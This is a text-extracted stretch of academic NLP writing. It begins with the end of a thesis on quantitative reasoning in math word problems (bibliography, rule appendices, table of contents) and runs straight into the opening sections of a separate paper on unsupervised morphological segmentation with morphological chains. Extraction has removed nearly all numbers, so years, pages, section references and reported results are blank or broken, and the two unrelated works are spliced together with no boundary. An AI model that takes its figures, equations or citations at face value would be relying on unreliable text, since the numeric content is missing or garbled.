theory and experiments with perceptron algorithms. in proceedings of the conference on empirical methods for natural language processing (emnlp). [cortes and vapnik, ] cortes, c. and vapnik, v. ( ). support-vector networks. machine learning, : – . [dagan et al., ] dagan, i., glickman, o., and magnini, b., editors ( ). the pascal recognising textual entailment challenge., volume . springer-verlag, berlin. [dagan et al., ] dagan, i., roth, d., sammons, m., and zanzoto, f. m. ( ). recognizing textual entailment: models and applications. [de kleer, ] de kleer, j. ( ). multiples representations of knowledge in a mechanics problem-solver. in proceedings of the th international joint conference on artificial intelligence - volume , ijcai’ , pages – . [de marneffe et al., ] de marneffe, m.-c., rafferty, a. n., and manning, c. d. ( ). finding contra- dictions in text. in proceedings of the annual meeting of the association for computational linguistics (acl), pages – , columbus, ohio. association for computational linguistics. [dejong, ] dejong, g. ( ). investigating explanation-based learning. kluwer international series in engineering and computer science. kluwer academic publishers. [dejong, ] dejong, g. ( ). explanation-based learning. in gonzalez, t., diaz-herrera, j., and tucker, a., editors, crc computing handbook: computer science and software engineering, pages . – . . crc press, boca raton. [dellarosa, ] dellarosa, d. ( ). a computer simulation of children’s arithmetic word-problem solving. behavior research methods, instruments, & computers, ( ): – . [diane j. briars, ] diane j. briars, j. h. l. ( ). an integrated model of skill in solving elementary word problems. cognition and instruction, ( ): – . [fletcher, ] fletcher, c. r. ( ). understanding and solving arithmetic word problems: a computer simulation. behavior research methods, instruments, & computers, ( ): – . [forbus, ] forbus, k. ( ). qualitative process theory. artificial intelligence, : – . [freund and schapire, ] freund, y. and schapire, r. ( ). large margin classification using the perceptron algorithm. in proceedings of the annual acm workshop on computational learning theory (colt), pages – . [ganchev et al., ] ganchev, k., graça, j., gillenwater, j., and taskar, b. ( ). posterior regulariza- tion for structured latent variable models. journal of machine learning research. [gelb, ] gelb, j. p. ( ). experiments with a natural language problem-solving system. in proceedings of the nd international joint conference on artificial intelligence, ijcai’ , pages – . [goldberg and elhadad, ] goldberg, y. and elhadad, m. ( ). an efficient algorithm for easy-first non-directional dependency parsing. in proceedings of the annual meeting of the north american asso- ciation of computational linguistics (naacl). [goldwasser and roth, ] goldwasser, d. and roth, d. ( ). learning from natural instructions. in proc. of the international joint conference on artificial intelligence (ijcai). [hosseini et al., ] hosseini, m. j., hajishirzi, h., etzioni, o., and kushman, n. ( ). learning to solve arithmetic word problems with verb categorization. in proceedings of the conference on empirical methods for natural language processing (emnlp). [joachims et al., ] joachims, t., finley, t., and yu, c.-n. ( ). cutting-plane training of structural svms. machine learning, ( ): – . [kai-wei chang and roth, ] kai-wei chang, r. s. and roth, d. ( ). a constrained latent variable model for coreference resolution. in proc. of the conference on empirical methods in natural language processing (emnlp). [koncel-kedziorski et al., ] koncel-kedziorski, r., hajishirzi, h., sabharwal, a., etzioni, o., and ang, s. ( ). parsing algebraic word problems into equations. tacl. [koncel-kedziorski et al., ] koncel-kedziorski, r., roy, s., amini, a., kushman, n., and hajishirzi, h. ( ). mawps: a math word problem repository. in naacl. [kuehne, a] kuehne, s. ( a). on the representation of physical quantities in natural language text. in proceedings of twenty-sixth annual meeting of the cognitive science society. [kuehne, b] kuehne, s. ( b). understanding natural language descriptions of physical phenomena. phd thesis, northwestern university, evanston, illinois. [kushman et al., ] kushman, n., zettlemoyer, l., barzilay, r., and artzi, y. ( ). learning to automatically solve algebra word problems. in proceedings of the annual meeting of the association for computational linguistics (acl), pages – . [kwiatkowski et al., ] kwiatkowski, t., choi, e., artzi, y., and zettlemoyer, l. ( ). scaling semantic parsers with on-the-fly ontology matching. in proceedings of the conference on empirical methods in natural language processing, pages – , seattle, washington, usa. association for computational linguistics. [liang et al., ] liang, p., jordan, m. i., and klein, d. ( ). learning dependency-based compositional semantics. in proceedings of the annual meeting of the association for computational linguistics (acl). [maccartney and manning, ] maccartney, b. and manning, c. d. ( ). modeling semantic contain- ment and exclusion in natural language inference. in proceedings of the nd international conference on computational linguistics (coling ), pages – , manchester, uk. coling organizing committee. [madaan et al., ] madaan, a., mittal, a., mausam, ramakrishnan, g., and sarawagi, s. ( ). nu- merical relation extraction with minimal supervision. in aaai. [marshall, ] marshall, s. p. ( ). schemas in problem solving. cambridge univ press. [mcdonald et al., ] mcdonald, r., pereira, f., ribarov, k., and hajic, j. ( ). non-projective de- pendency parsing using spanning tree algorithms. in proceedings of the conference on empirical methods for natural language processing (emnlp), pages – , vancouver, british columbia, canada. asso- ciation for computational linguistics. [miller et al., ] miller, g., beckwith, r., fellbaum, c., gross, d., and miller, k. ( ). wordnet: an on-line lexical database. international journal of lexicography, ( ): – . [mitra and baral, ] mitra, a. and baral, c. ( ). learning to use formulas to solve simple arithmetic problems. in acl. [mukherjee and garain, ] mukherjee, a. and garain, u. ( ). a review of methods for automatic understanding of natural language mathematical problems. artificial intelligence review, ( ): – . [novak, ] novak, g. s. ( ). computer understanding of physics problems stated in natural language. phd thesis, the university of texas at austin. [oberem, ] oberem, g. ( ). albert: a physics problem solving monitor and coach. in proceedings of the first inter- national conference on computer assisted learning (iccal ), iccal’ , pages – . [palmer et al., ] palmer, m., gildea, d., and xue, n. ( ). semantic role labeling, volume . morgan & claypool publishers. [pennington et al., ] pennington, j., socher, r., and manning, c. d. ( ). glove: global vectors for word representation. in proc. of emnlp. [punyakanok and roth, ] punyakanok, v. and roth, d. ( ). the use of classifiers in sequential inference. in proc. of the conference on neural information processing systems (nips), pages – . mit press. [punyakanok et al., a] punyakanok, v., roth, d., and yih, w. ( a). the necessity of syntactic parsing for semantic role labeling. in proc. of the international joint conference on artificial intelligence (ijcai), pages – . [punyakanok et al., ] punyakanok, v., roth, d., and yih, w. ( ). the importance of syntactic parsing and inference in semantic role labeling. computational linguistics, ( ). [punyakanok et al., b] punyakanok, v., roth, d., yih, w., and zimak, d. ( b). learning and inference over constrained output. in proc. of the international joint conference on artificial intelligence (ijcai), pages – . [purdy, ] purdy, w. ( ). a logic for natural language. notre dame journal of formal logic, ( ): – . [roth and yih, ] roth, d. and yih, w. ( ). a linear programming formulation for global inference in natural language tasks. in ng, h. t. and riloff, e., editors, proc. of the conference on computational natural language learning (conll), pages – . association for computational linguistics. [roth and yih, ] roth, d. and yih, w. ( ). integer linear programming inference for conditional random fields. in proc. of the international conference on machine learning (icml), pages – . [roth and zelenko, ] roth, d. and zelenko, d. ( ). part of speech tagging using a network of linear separators. in coling-acl, the th international conference on computational linguistics, pages – . [roy and roth, ] roy, s. and roth, d. ( ). solving general arithmetic word problems. in proc. of the conference on empirical methods in natural language processing (emnlp). [roy and roth, ] roy, s. and roth, d. ( ). unit dependency graph and its application to arithmetic word problem solving. in proc. of the conference on artificial intelligence (aaai). [roy et al., ] roy, s., vieira, t., and roth, d. ( ). reasoning about quantities in natural language. transactions of the association for computational linguistics (tacl), . [sammons et al., ] sammons, m., vydiswaran, v., and roth, d. ( ). ask not what textual entail- ment can do for you... in proc. of the annual meeting of the association for computational linguistics (acl), uppsala, sweden. association for computational linguistics. [sarawagi and cohen, ] sarawagi, s. and cohen, w. w. ( ). semi-markov conditional random fields for information extraction. in the conference on advances in neural information processing systems (nips), pages – . [seo et al., ] seo, m. j., hajishirzi, h., farhadi, a., and etzioni, o. ( ). diagram understanding in geometry questions. in aaai. [shalev-shwartz et al., ] shalev-shwartz, s., singer, y., and srebro, n. ( ). pegasos: primal esti- mated sub-gradient solver for svm. in ghahramani, z., editor, proceedings of the international conference on machine learning (icml), pages – . omnipress. [sutton and mccallum, ] sutton, c. and mccallum, a. ( ). piecewise pseudolikelihood for effi- cient training of conditional random fields. in ghahramani, z., editor, proceedings of the international conference on machine learning (icml), pages – . omnipress. [tsochantaridis et al., ] tsochantaridis, i., joachims, t., hofmann, t., and altun, y. ( ). large margin methods for structured and interdependent output variables. journal of machine learning re- search, : – . [wong and mooney, ] wong, y.-w. and mooney, r. ( ). learning synchronous grammars for se- mantic parsing with lambda calculus. in proceedings of the annual meeting of the association for com- putational linguistics (acl), pages – , prague, czech republic. association for computational linguistics. [yu and joachims, ] yu, c. and joachims, t. ( ). learning structural svms with latent variables. in proceedings of the international conference on machine learning (icml). appendix a lexicon for equation parsing we construct a high precision list of rules, to parse sentences describing mathematical concepts, for example, “difference of”, “greater than”, etc for the equation parsing task described in chapter . for each non-leaf node n of a projective equation tree, we define the following terms : . midspan(n) : the string from min(span-end(lc(n)),span-end(rc(n))) to max(span-start(lc(n)),span-start(rc(n))). . leftspan(n) : the string ending at min(span-start(lc(n)),span-start(rc(n))) and starting from the nearest trigger position on the left. . rightspan(n) : the string starting at max(span-end(lc(n)),span-end(rc(n))) and ending at the nearest trigger position on the right. . lefttoken(n) : defined only for leaves, indicates the span of text for the trigger of n. the rules in our lexicon are described using the above terms. they are as follows, ordered from low precedence to high precedence. . if leftspan(n) contains “sum of” and midspan(n) contains “and” or is the empty string, �(n) should be +. . if midspan(n) contains one of “added to”, “plus”, “more than” “taller than”, “greater than”, “larger than”, “faster than”, “longer than”, “increased”, �(n) should be +. . if midspan(n) contains one of “more than” “taller than”, “greater than”, “larger than”, “faster than”, “longer than”, and rightspan(n) contains “by”, �(n) should be −, and order(n) should be lr. . if leftspan(n) contains “difference of” and midspan(n) contains “and” or is the empty string, �(n) should be − and order(n) should be lr. . if leftspan(n) contains one of “exceeds”, “minus”, “decreased”, �(n) should be −, and order(n) should be lr. . if midspan(n) contains one of “subtracted” “shorter than”, “less than”, “slower than”, “smaller than”, �(n) should be −, and order(n) should be rl. . if midspan(n) contains “multiplied by”, �(n) is ×. . if leftspan(n) contains “product of” and midspan(n) contains “and”, �(n) should be ×. . if leftspan(n) contains “ratio of”, �(n) should be ÷, and order(n) should be lr. . if lefttoken(n) contains one of “thrice”, “triple”, “twice”, “double”, “half”, or if midspan(n) contains “times”, �(n) is ×. . if lefttoken(n) contains one of “thrice”, “triple”, “twice”, “double”, “half”, or if midspan(n) contains “times”, and midspan(n) contains “as”, and rightspan(n) contains “as”, operation at �(n) is ÷, and order(n) is rl. appendix b declarative rules for arithmetic word problems here, we list all the declarative rules for each knowledge type used in chapter . • transfer . [verb ∈ have] ∧ [verb ∈ have] ∧ [coref(subj , subj )] ⇒ subtraction . [verb ∈ have] ∧ [verb ∈ (get ∪ construct)] ∧ [coref(subj , subj )] ⇒ addition . [verb ∈ have] ∧ [verb ∈ (give ∪ destroy)] ∧ [coref(subj , subj )] ⇒ subtraction . [verb ∈ (get ∪ construct)] ∧ [verb ∈ have] ∧ [coref(subj , subj )] ⇒ subtraction . [verb ∈ (get ∪ construct)]∧[verb ∈ (get ∪ construct)]∧[coref(subj , subj )] ⇒ addition . [verb ∈ (get ∪ construct)] ∧ [verb ∈ (give ∪ destroy)] ∧ [coref(subj , subj )] ⇒ subtraction . [verb ∈ (give ∪ destroy)] ∧ [verb ∈ have] ∧ [coref(subj , subj )] ⇒ addition . [verb ∈ (give ∪ destroy)] ∧ [verb ∈ (get ∪ construct)] ∧ [coref(subj , subj )] ⇒ subtraction . [verb ∈ (give ∪ destroy)] ∧ [verb ∈ (give ∪ destroy)] ∧ [coref(subj , subj )] ⇒ addition we also have another rule for each rule above, which states that if coref(subj , obj ) or coref(subj , obj ) is true, and none of the verbs is construct or destroy, the final operation is changed from ad- dition to subtraction, or vice versa. to determine the order of subtraction, we always subtract the smaller number from the larger number. • dimensional analysis . [coref(unit , rate )||coref(unit , rate )] ⇒ multiplication . [coref(unit , unit )] ∧ [rate = null] ⇒ division . [coref(unit , unit )] ∧ [rate = null] ⇒ division (reverse order) • explicit math . [coref(subj , iobj )||coref(subj , iobj )] ∧ [math ∈ add||math ∈ add] ⇒ addition . [coref(subj , iobj )||coref(subj , iobj )] ∧ [math ∈ sub||math ∈ sub] ⇒ subtraction . [coref(subj , subj )] ∧ [math ∈ add||math ∈ add] ⇒ subtraction . [coref(subj , subj )] ∧ [math ∈ sub||math ∈ sub] ⇒ addition . [coref(subj , subj )] ∧ [math ∈ mul] ⇒ division (reverse order) . [coref(subj , subj )] ∧ [math ∈ mul] ⇒ division . [coref(subj , iobj )||coref(subj , iobj )] ∧ [math ∈ mul||math ∈ mul] ⇒ multiplication • part-whole relationship . [sibling(number , number )] ⇒ addition . [hyponym(number , number )] ⇒ subtraction . [hypernym(number , number )] ⇒ subtraction list of tables list of figures chapter introduction motivation math word problems: an abstraction for quantitative reasoning challenges in automated quantitative reasoning variability of natural language text quantity argument detection reasoning about multiple quantities incorporating domain knowledge contributions of the thesis overview of the thesis chapter background what is a structure? structured prediction inference in structured models learning structured prediction models structural support vector machines discussion and special case structured prediction with latent variables chapter early work in quantitative reasoning early algebra and arithmetic solvers student program other arithmetic word problem solvers solvers for other domains recent advances in statistical solvers chapter quantity entailment introduction related work representing quantities extraction of quantities features mapping text segments into qvr extraction of units quantity entailment reasoning framework scope of qe inference experimental study datasets quantity segmentation quantity entailment currency range search qualitative analysis conclusion chapter equation parsing introduction related work the equation parsing task equation parse representation projectivity predicting equation parse predicting quantity trigger list predicting variable trigger list predicting equation tree alternatives experimental results dataset equation parsing modules equation parsing results error analysis conclusion chapter arithmetic word problems introduction related work expression tree and problem decomposition mapping problems to expression trees global inference for expression trees quantity schema relevance classifier lca operation classifier experimental results datasets relevance classifier lca operation classifier global inference module discussion conclusion chapter unit dependency graphs introduction unit dependency graph learning to predict udgs vertex classifier edge classifier constrained inference joint inference with an arithmetic solver monotonic expression tree arithmetic word problem solver joint inference consistent rate unit graphs experiments dataset data acquisition udg prediction solving arithmetic word problems discussion conclusion chapter mapping to declarative knowledge introduction knowledge representation transfer dimensional analysis explicit math part-whole relation mapping of word problems to declarative knowledge scoring answer derivations learning inference model and implementation details supervision features experiments results on existing dataset new dataset creation generalization from biased dataset results on the new dataset analysis related work conclusion chapter conclusion and future work summary limitations future directions commonsense quantitative reasoning unified framework for solvers automated math tutoring system references appendix a lexicon for equation parsing appendix b declarative rules for arithmetic word problems an unsupervised method for uncovering morphological chains karthik narasimhan, regina barzilay and tommi jaakkola csail, massachusetts institute of technology {karthikn, regina, tommi}@csail.mit.edu abstract most state-of-the-art systems today produce morphological analysis based only on ortho- graphic patterns. in contrast, we propose a model for unsupervised morphological anal- ysis that integrates orthographic and seman- tic views of words. we model word forma- tion in terms of morphological chains, from base words to the observed words, breaking the chains into parent-child relations. we use log-linear models with morpheme and word- level features to predict possible parents, in- cluding their modifications, for each word. the limited set of candidate parents for each word render contrastive estimation feasible. our model consistently matches or outper- forms five state-of-the-art systems on arabic, english and turkish. introduction morphologically related words exhibit connections at multiple levels, ranging from orthographical pat- terns to semantic proximity. for instance, the words playing and played share the same stem, but also carry similar meaning. ideally, all these comple- mentary sources of information would be taken into account when learning morphological structures. most state-of-the-art unsupervised approaches to morphological analysis are built primarily around orthographic patterns in morphologically-related words (goldwater and johnson, ; creutz and lagus, ; snyder and barzilay, ; poon et al., ). in these approaches, words are com- monly modeled as concatenations of morphemes. code is available at https://github.com/ karthikncode/morphochain. this morpheme-centric view is well-suited for un- covering distributional properties of stems and af- fixes. but it is not well-equipped to capture semantic relatedness at the word level. in contrast, earlier approaches that capture se- mantic similarity in morphological variants oper- ate solely at the word level (schone and juraf- sky, ; baroni et al., ). given two candi- date words, the proximity is assessed using standard word-distributional measures such as mutual infor- mation. however, the fact that these models do not model morphemes directly greatly limits their per- formance. in this paper, we propose a model to integrate or- thographic and semantic views. our goal is to build a chain of derivations for a current word from its base form. for instance, given a word playfully, the corresponding chain is play → playful → playfully. the word play is a base form of this derivation as it cannot be reduced any further. individual deriva- tions are obtained by adding a morpheme (ex. -ful ) to a parent word (ex. play). this addition may be implemented via a simple concatenation, or it may involve transformations. at every step of the chain, the model aims to find a parent-child pair (ex. play- playful ) such that the parent also constitutes a valid entry in the lexicon. this allows the model to di- rectly compare the semantic similarity of the parent- child pair, while also considering the orthographic properties of the morphemic combination. we model each step of a morphological chain by means of a log-linear model that enables us to in- corporate a wide range of features. at the seman- tic level, we consider the relatedness between two words using the corresponding vector embeddings. at the orthographic level, features capture whether transactions of the association for computational linguistics, vol. , pp. – , . action editor: yuji matsumoto. submission batch: / ; revision batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. https://github.com/karthikncode/morphochain https://github.com/karthikncode/morphochain the words in the chain actually occur in the corpus, how affixes are reused, as well as how the words are altered during the addition of morphemes. we use contrastive estimation (smith and eisner, ) to efficiently learn this model in an unsupervised manner. specifically, we require that each word has greater support among its bounded set of candidate parents than an artificially constructed neighboring word would. we evaluate our model on datasets in three lan- guages: arabic, english and turkish. we compare our performance against five state-of-the-art unsu- pervised systems: morfessor baseline (virpioja et al., ), morfessor catmap (creutz and lagus, ), agmorph (sirts and goldwater, ), the lee segmenter (lee et al., ; stallard et al., ) and the system of poon et al. ( ). our model consistently equals or outperforms these sys- tems across the three languages. for instance, on english, we obtain an . % gain in f-measure over morfessor. our experiments also demonstrate the value of semantic information. while the contribu- tion varies from % on turkish to % on the en- glish dataset, it nevertheless improves performance across all the languages. related work currently, top performing unsupervised morpholog- ical analyzers are based on the orthographic prop- erties of sub-word units (creutz and lagus, ; creutz and lagus, ; poon et al., ; sirts and goldwater, ). adding semantic information to these systems is not an easy task, as they operate at the level of individual morphemes, rather than mor- phologically related words. the value of semantic information has been demonstrated in earlier work on morphological anal- ysis. schone and jurafsky ( ) employ an lsa- based similarity measure to identify morphological variants from a list of orthographically close word pairs. the filtered pairs are then used to identify stems and affixes. based on similar intuition, baroni et al. ( ) design a method that integrates these sources of information, captured as two word pair lists, ranked based on edit distance and mutual in- formation. these lists are subsequently combined using a deterministic weighting function. in both of these algorithms, orthographic related- ness is based on simple deterministic rules. there- fore, semantic relatedness plays an essential role in the success of these methods. however, these al- gorithms do not capture distributional properties of morphemes that are critical to the success of current state-of-the-art algorithms. in contrast, we utilize a single statistical framework that seamlessly com- bines both sources of information. moreover, it al- lows us to incorporate a wide range of additional features. our work also relates to the log-linear model for morphological segmentation developed by poon et al. ( ). they propose a joint model over all words (observations) and their segmentations (hid- den), using morphemes and their contexts (charac- ter n-grams) for the features. since the space of all possible segmentation sets is huge, learning and in- ference are quite involved. they use techniques like contrastive estimation, sampling and simulated an- nealing. in contrast, our formulation does not re- sult in such a large search space. for each word, the number of parent candidates is bounded by its length multiplied by the number of possible trans- formations. therefore, contrastive estimation can be implemented via enumeration, and does not re- quire sampling. moreover, operating at the level of words (rather than morphemes) enables us to incor- porate semantic and word-level features. most recently, work by sirts and goldwater ( ) uses adaptor grammars for minimally su- pervised segmentation. by defining a morphological grammar consisting of zero or more prefixes, stems and suffixes, they induce segmentations over words in both unsupervised and semi-supervised settings. while their model (agmorph) builds up a word by combining morphemes in the form of a parse tree, we operate at the word level and build up the final word via intermediate words in the chain. in other related work, dreyer and eisner ( ) tackle the problem of recovering morphological paradigms and inflectional principles. they use a bayesian generative model with a log-linear framework, using expressive features, over pairs of strings. their work, however, handles a different task from ours and requires a small amount of an- notated data to seed the model. in this work, we make use of semantic infor- mation to help morphological analysis. lee et al. ( ) present a model that takes advantage of syn- tactic context to perform better morphological seg- mentation. stallard et al. ( ) improve on this ap- proach using the technique of maximum marginal decoding to reduce noise. their best system con- siders entire sentences, while our approach (and the morphological analyzers described above) operates at the vocabulary level without regarding sentence context. hence, though their work is not directly comparable to ours, it presents an interesting orthog- onal view to the problem. model . definitions and framework we use morphological chains to model words in the language. a morphological chain is a short sequence of words that starts from the base word and ends up in a morphological variant. each node in the chain is, by assumption, a valid word. we refer to the word that is morphologically changed as the parent word and its morphological variant as the child word. a word that does not have any morphological parent is a base word (e.g., words like play, chat, run ). words in a chain (other than the base word) are created from their parents by adding morphemes (prefixes, suffixes, or other words). for example, a morphological chain that ends up in the word in- ternationally could be nation → national → inter- national → internationally. the base word for this chain is nation. note that the same word can belong to multiple morphological chains. for example, the word national appears also as part of another chain that ends up in nationalize. these chains are treated separately but with shared statistical support for the common parts. for this reason, our model breaks morphological chains into possible parent-child re- lations such as (nation, national ). we use a log-linear model for predicting parent- child pairs. a log-linear model allows an easy, effi- cient way of incorporating several different features pertaining to parent-child relations. in our case, we leverage both orthographic and semantic patterns to encode representative features. we distinguish base words from morphological roots which do not strictly speaking have to be valid words in the language. segment cosine similarity p . pl - . pla - . play . playe . player . table : cosine similarities between word vectors of various segments of the word player and the vector of player. a log-linear model consists of a set of features represented by a feature vector φ : w ×z → rd and a corresponding weight vector θ ∈ rd. here, w is a set of words and z is the set of candidates for words in w, that includes the parents as well as their types. specifically, a candidate is a (parent, type) pair, where the type variable keeps track of the type of morphological change (or the lack thereof if there is no parent) as we go from the parent to the child. in our experiments, z is obtained by collecting to- gether all sub-words created by splitting observed words in w at all different points. for instance, if we take the word cars, the candidates obtained by splitting would include (car, suffix), (ca, suffix), (c, suffix), (ars, prefix), (rs, prefix) and (s, prefix). note that the parent may undergo changes as it is joined with the affix and thus, there are more choices for the parent than just the ones obtained by splitting. hence, to the set of candidates, we also add modified sub-words where transformations in- clude character repetition (plan → planning ), dele- tion (decide → deciding ) or replacement (carry → carried ). following the above example for the word cars, we get candidates like (cat, modify) and (cart, delete). each word also has a stop candidate (-, stop), which is equivalent to considering it as a base word with no parent. let us define the probability of a particular word- candidate pair (w ∈ w,z ∈ z) as p(w,z) ∝ eθ·φ(w,z). the conditional probability of a candidate we found that restricting the set of parents to sub-words that are at least half the length of the original word helped im- prove the performance of the system. z given a word w is then p(z|w) = e θ·φ(w,z) ∑ z′∈c(w) e θ·φ(w,z′) , z ∈ c(w) where c(w) ⊂z refers to the set of possible candi- dates (parents and their types) for the word w ∈w. in order to generate a possible ancestral chain for a word, we recursively predict parents until the word is predicted to be a base word. in our model, these choices are included in the set of candidates for the specific word, and their likelihood is controlled by the type related features. details of these and other features are given in section . . . features this section provides an overview of the features used in our model. the features are defined for a given word w, parent p and type t (recall that a can- didate z ∈ z is the pair (p,t)). for computing some of these features, we use an unannotated list of words with frequencies (details in section ). ta- ble provides a summary of the features. semantic similarity we hypothesize that mor- phologically related words exhibit semantic similar- ity. to this end, we introduce a feature that mea- sures cosine similarity between the word vectors of the word (~w) and the parent (~p). these word vectors are learned from co-occurrence patterns from a large corpus (see section for details). to validate this measure, we computed the cosine similarity between words and their morphological parents from the celex database (baayen et al., ). on average, the resulting word-parent sim- ilarity score is . , compared to . for ran- domly chosen word-parent combinations. affixes a distinctive feature of affixes is their fre- quent occurrence in multiple words. to capture this pattern, we automatically generate a list of fre- quently occurring candidate affixes. these candi- dates are collected by considering the string differ- ence between a word and its parent candidates which appear in the word list. for example, for the word paints, possible suffixes include -s derived from the for strings which do not have a vector learnt from the cor- pus, we set the cosine value to be - . . the cosine values range from around - . to . usually. language top suffixes english -s, -’s, -d, -ed, -ing, -’, -s’, -ly, -er, -e turkish -n, -i, -lar, -dir, -a, -den, -de, -in, -leri, -ler arabic -p, -a, -f, -y, -t, -af, -h, -ha, -yp, -at table : top ten suffixes in automatically produced suffix lists. parent paint, -ts from the parent pain and -ints from the word pa. similarly, we compile a list of poten- tial prefixes. these two lists are sorted by their fre- quency and thresholded. for each affix in the lists, we have a corresponding indicator variable. for un- seen affixes, we use an unk (unknown) indicator. these automatically constructed lists act as a proxy for the gold affixes. in english, choosing the top suffixes in this manner gives us correct suffixes (compared against gold suffixes). table gives some examples of suffixes generated this way. affix correlation while the previous feature con- siders one affix assignment at a time, there is a known correlation between affixes attached to the same stem. for instance, in english, verbs that can be modified by the suffix -ing, can also take the related suffix -ed. therefore, we introduce a fea- ture that measures, whether for a given affix and parent, we also observe in the wordlist the same parent modified by its related affix. for exam- ple, for the pair (walking, walk), the feature in- stance affixcorr(ing, ed) is set to , because the word walked is in the wordlist. to construct pairs of related affixes, we compute the correlation between pairs in auto-generated affix list described previously. this correlation is propor- tional to the number of stems the two affixes share. for english, examples of such pairs include (inter-, re-), (under-, over-), (-ly, -s), and (-er, -ing). presence in wordlist we want to bias the model to select parents that constitute valid words. more- over, we would like to take into account the fre- quency of the parent words. we encode this infor- mation as the logarithm of their word counts in the wordlist (wordfreq). for parents not in the wordlist, we set a binary outofvocab feature to . this is not an absolute requirement in the model. feature type word (w) candidate (p,t) feature value cosine painter (paint, suffix) ~w ·~p . affix painter (paint, suffix) suffix=er affix correlation walking (walk, suffix) affixcorr(ing, ed) wordlist painter (paint, suffix) wordfreq . outofvocab transformations planning (plan, repeat) type=repeat × chars=(n,-) deciding (decide, delete) type=delete × chars=(e,-) carried (carry, modify) type=modify × chars=(y,i) stop painter (-, stop) begin=pa end=er . < maxcos < . length= table : example of various types of features used in the model. ~w and ~p are the word vectors for the word and parent, respectively. transformations we also support transforma- tions to enable non-concatenative morphology. even in english, which is mostly concatenative, such transformations are frequent. we consider three kinds of transformations previously considered in the literature (goldwater and johnson, ): • repetition of the last character in the parent (ex. plan → planning ) • deletion of the last character in the parent (ex. decide → deciding ) • modification of the last character of the parent (ex. carry → carried ) we add features that are the cartesian prod- uct of the type of transformation and the charac- ter(s) involved. for instance, for the parent-child pair (believe, believing ), the feature type=delete × chars=(e,-) will be activated, while the rest of the transformational features will be . stop condition finally, we introduce features that aim to identify base words which do not have a parent. the features include the length of the word, and the starting and ending character uni- grams and bigrams. in addition, we include a feature that records the highest cosine similarity between the word and any of its candidate parents. this fea- ture will help, for example, to identify paint as a base word, instead of choosing pain as its parent. . learning we learn the log-linear model in an unsupervised manner without explicit feedback about correct mor- phological segmentations. we assume that we have an unannotated wordlist d for this purpose. a typ- ical approach to learning such a model would be to maximize the likelihood of all the observed words in d over the space of all strings constructible in the alphabet, Σ∗, by marginalizing over the hidden candidates. in other words, we could use the em- algorithm to maximize l(θ; d) = ∏ w∗∈d p(w∗) = ∏ w∗∈d ∑ z∈c(w∗) p(w∗,z) = ∏ w∗∈d [ ∑ z∈c(w∗) e θ·φ(w∗,z) ∑ w∈Σ∗ ∑ z∈c(w) e θ·φ(w,z) ] ( ) however, maximizing l(θ; d) is problematic since approximate methods would be needed to sum over Σ∗ in order to calculate the normalization term in ( ). moreover, we would like to encourage the model to emphasize relevant parent-child pairs out of a smaller set of alternatives rather than those per- taining to all the words. we also tried maximizing instead of marginalizing, but the model gets stuck in one of the numerous local optima. in other words, assign higher probability mass. we employ contrastive estimation (smith and eisner, ) and replace the normalization term by a sum over the neighbors of each word. for each word in the language, we create neighboring strings in two sets. for the first set, we transpose a single pair of adjacent characters of the word. we perform this transposition over the first k or the last k charac- ters of the word. for the second set, we transpose two pairs of characters simultaneously – one from the first k characters and one from the last k. the combined set of artificially constructed words represents the events that we wish to move probabil- ity mass away from in favor of the actually observed words. the neighbors facilitate the learning of good weights for the affix features by providing the re- quired contrast (at both ends of the words) to the actual words in the vocabulary. a remaining con- cern is that the model may not distinguish any arbi- trary substring from a good suffix/prefix. for exam- ple, -ng appears in all the words that end with -ing, and could be considered a valid suffix. we include other features to help make this distinction. specifi- cally, we include features such as word vector simi- larity and the presence of the parent in the observed wordlist. for example, in the word painting, the par- ent candidate paint is likely to occur and also has a high cosine similarity with painting in terms of their word vectors. in contrast, painti does not. given the list of words and their neighborhoods, we define the contrastive likelihood as follows: ( ) lce(θ,d) = ∏ w∗∈d [ ∑ z∈c(w∗) e θ·φ(w∗,z) ∑ w∈n(w∗) ∑ z∈c(w) e θ·φ(w,z) ] where n(w∗) is the neighborhood of w∗. this like- lihood is much easier to evaluate and optimize. after adding in a standard regularization term, we maximize the following log likelihood objective: ( ) ∑ w∗ ∈d  log ∑ z∈c(w∗) eθ·φ(w ∗,z) − log ∑ w∈n(w∗) ∑ z∈c(w) eθ·φ(w,z)  −λ||θ|| the performance increases with increasing k until k = , after which no gains were observed. the corresponding gradient can be derived as: ∂lce(θ; d) ∂θj = ∑ w∗∈d [∑ z∈c(w∗) φj(w ∗,z) ·eθ·φ(w∗,z) ∑ z∈c(w∗) e θ·φ(w∗,z) − ∑ w∈n(w∗) ∑ z∈c(w) φj(w,z) ·eθ·φ(w,z)∑ w∈n(w∗) ∑ z∈c(w) e θ·φ(w,z) ] − λθj ( ) we use lbfgs-b (byrd et al., ) to optimize lce(θ; d) with gradients given above. . prediction given a test word, we predict a morphological chain in a greedy step by step fashion. in each step, we use the learnt weights to predict the best parent for the current word (from the set of candidates), or choose to stop and declare the current word as a base word if the stop case has the highest score. once we have the chain, we can derive a morphological segmentation by inserting a segmentation point (into the test word) appropriately for each edge in the chain. algorithms and provide details on the predic- tion procedure. in both algorithms, type refers to the type of modification (or lack of) that the parent undergoes: prefix/suffix addition, types of transfor- mation like repetition, deletion, modification, or the stop case. algorithm procedure to predict a parent for a word : procedure predict(word) : candidates ← candidates(word) : bestscore ← : bestcand ← (−,stop) : for cand ∈ candidates do : features ← features(word,cand) : score ← modelscore(features) : if score > bestscore then : bestscore ← score : bestcand ← cand : return bestcand algorithm procedure to predict a morphological chain : procedure getchain(word) : candidate ← predict(word) : parent,type ← candidate : if type = stop then return [(word, stop)] : return getchain(parent)+[(parent,type)] lang train test wordvec (# words) (# words) (# words) english mc- mc- : wikipedia ( k) ( ) ( m) turkish mc- mc- : boun ( k) ( ) ( m) arabic gigaword atb gigaword ( . m) ( k) ( . g) table : data corpora and statistics. mc- = mor- phochallenge , mc- : = morphochal- lenges - (aggregated), boun = boun cor- pus (sak et al., ), gigaword = arabic gigaword corpus (parker et al., ), atb = arabic tree- bank (maamouri et al., ) experimental setup data we run experiments on three different lan- guages: english, turkish and arabic. for each lan- guage, we utilize corpora for training, testing and learning word vectors. the training data consists of an unannotated wordlist with frequency information, while the test data is a set of gold morphological segmentations. for the word vectors, we train the word vec tool (mikolov et al., ) on large text corpora and obtain -dimensional vectors for all three languages. table provides information about each dataset. evaluation measure we test our model on the task of morphological segmentation. we evalu- ate performance on individual segmentation points, which is standard for this task (virpioja et al., ). we compare predicted segmentations against the gold test data for each language and report overall precision, recall and f- scores calculated across 